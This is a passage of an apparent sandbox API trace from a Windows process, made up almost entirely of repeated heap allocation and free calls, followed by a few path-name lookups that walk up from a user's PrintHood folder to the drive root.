hHeap=0x6a0000) returned 1 [0175.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0175.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.593] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.593] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.603] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\PrintHood\\") returned="PrintHood\\" [0175.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d28008 [0175.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0175.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.604] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0175.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0175.604] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0175.604] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.604] PathFindFileNameW 